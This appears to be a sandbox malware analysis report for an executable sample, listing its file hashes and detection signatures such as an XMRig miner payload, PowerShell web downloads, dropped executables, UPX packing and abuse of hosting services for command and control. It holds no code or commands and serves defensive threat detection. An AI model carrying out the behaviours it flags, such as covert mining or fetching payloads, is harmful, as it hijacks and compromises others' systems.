General

  • Target

    20dcc4229970dea713a3c7d63f8fd580_NeikiAnalytics.exe

  • Size

    3.3MB

  • Sample

    240527-gb9vvsag78

  • MD5

    20dcc4229970dea713a3c7d63f8fd580

  • SHA1

    4aaf8b80cdc628312e2c77898d35989750e121a7

  • SHA256

    d54c7bfbc1fc8eb836f23cd0488711ee056f1476bc0ef660bbd6187f3e210638

  • SHA512

    7b8b722c2ddc62f24abff9f4e85892b38bc7d6bc59a488f2d3997748a8389b9eea447670eab209a7310e127bfa2c75b55ba335b2c98c08af1408fd4fc0ff2620

  • SSDEEP

    98304:71ONtyBeSFkXV1etEKLlWUTOfeiRA2R76zHrW6:7bBeSFkW

Malware Config

Targets

    • Target

      20dcc4229970dea713a3c7d63f8fd580_NeikiAnalytics.exe

    • Size

      3.3MB

    • MD5

      20dcc4229970dea713a3c7d63f8fd580

    • SHA1

      4aaf8b80cdc628312e2c77898d35989750e121a7

    • SHA256

      d54c7bfbc1fc8eb836f23cd0488711ee056f1476bc0ef660bbd6187f3e210638

    • SHA512

      7b8b722c2ddc62f24abff9f4e85892b38bc7d6bc59a488f2d3997748a8389b9eea447670eab209a7310e127bfa2c75b55ba335b2c98c08af1408fd4fc0ff2620

    • SSDEEP

      98304:71ONtyBeSFkXV1etEKLlWUTOfeiRA2R76zHrW6:7bBeSFkW

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

    • XMRig Miner payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Powershell Invoke Web Request.

    • Executes dropped EXE

    • Loads dropped DLL

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Legitimate hosting services abused for malware hosting/C2

MITRE ATT&CK Enterprise v15

Tasks